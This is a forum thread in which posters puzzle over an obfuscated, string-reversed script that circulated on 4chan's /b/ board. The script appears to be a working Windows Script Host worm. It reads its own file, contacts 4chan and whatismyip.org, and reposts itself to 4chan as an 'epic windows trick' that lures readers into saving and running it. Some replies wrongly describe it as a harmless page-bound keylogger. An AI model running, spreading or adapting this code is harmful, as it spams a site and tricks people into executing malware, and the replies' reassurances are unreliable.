Javascript help

Denismage

Can someone tell me what this does? It's supposed to be a javascript.

eval((')emantpircs.HSW(nur.s;)4e6(peels.HSW;))"=eman;atad-mrof:noitisopsid-tnetnoc '+

'0-- ",g/#!/(ecalper.)"tsiger edom#!"+c+" moc#!"+)tr+" eman#!"+)8,3+)"/se"(fOxedni.'+

'r(rtsbus.r+" otser#!"((dnes.x;)"0=yradnuob;atad-mrof/trapitlum","epyt-tnetnoc"(red'+

'aehtseuqertes.x;)0,"php.draobgmi/b/gro.nahc4.tad//:ptth","tsop"(nepo.x;

LMTHrenni.]0['+

')"erp"(emaNgaTyBstnemelEteg.txetesnopser.y=tr;)(dnes.y;)0,"/gro.piymsitahw.www//

:pt'+

'th","teg"(nepo.y;)"ptthlmx.2lmxsm"(tcejboetaerc=y;txetesnopser.x=r;)(d

nes.x;)0,"b/gro'+

'.nahc4.gmi//:ptth","teg"(nepo.x;)"ptthlmx.2lmxsm"(tcejboetaerc.HSW=x;)

(lladaer.)emantp'+

'ircs.HSW(eliftxetnepo.f+" detaerc uoy elif eht nepo dna "+emantpircs.HSW+" sa evas ,dap'+

eton ot gniwollof eht ypoc :kcirt swodniw cipe"=c;)"llehs.tpircsw"(tcejboetaerc.HSW=s;'+

')"tcejbometsyselif.gnitpircs"(tcejboetaerc.HSW=f'

).split("").reverse().join(""))

Something not nice or the coding wouldn't have been reversed!

Can see the term "epic windows trick" reversed. However not everyone's definition of epic is the same. I wouldn't risk running that.

I wouldn't risk running that either and I know it's something not nice, that's why I'm asking what it does. My guess is that it does something along going on /b/ and posting the code over and over, by I want to know what it ACTUALLY does. It would be nice if someone wrote the script in plain language.

Keylogger in JS would on be good on the page that the JS is on. The JS has to be on a page to be active. I wouldn't be worried to run it, i wouldn't run it though if i had a choice. How did you get the script?

Keylogger in JS would on be good on the page that the JS is on. The JS has to be on a page to be active. I wouldn't be worried to run it, i wouldn't run it though if i had a choice. How did you get the script?

It's all over /b/

Supposedly it goes to 4chan and posts that code over and over again.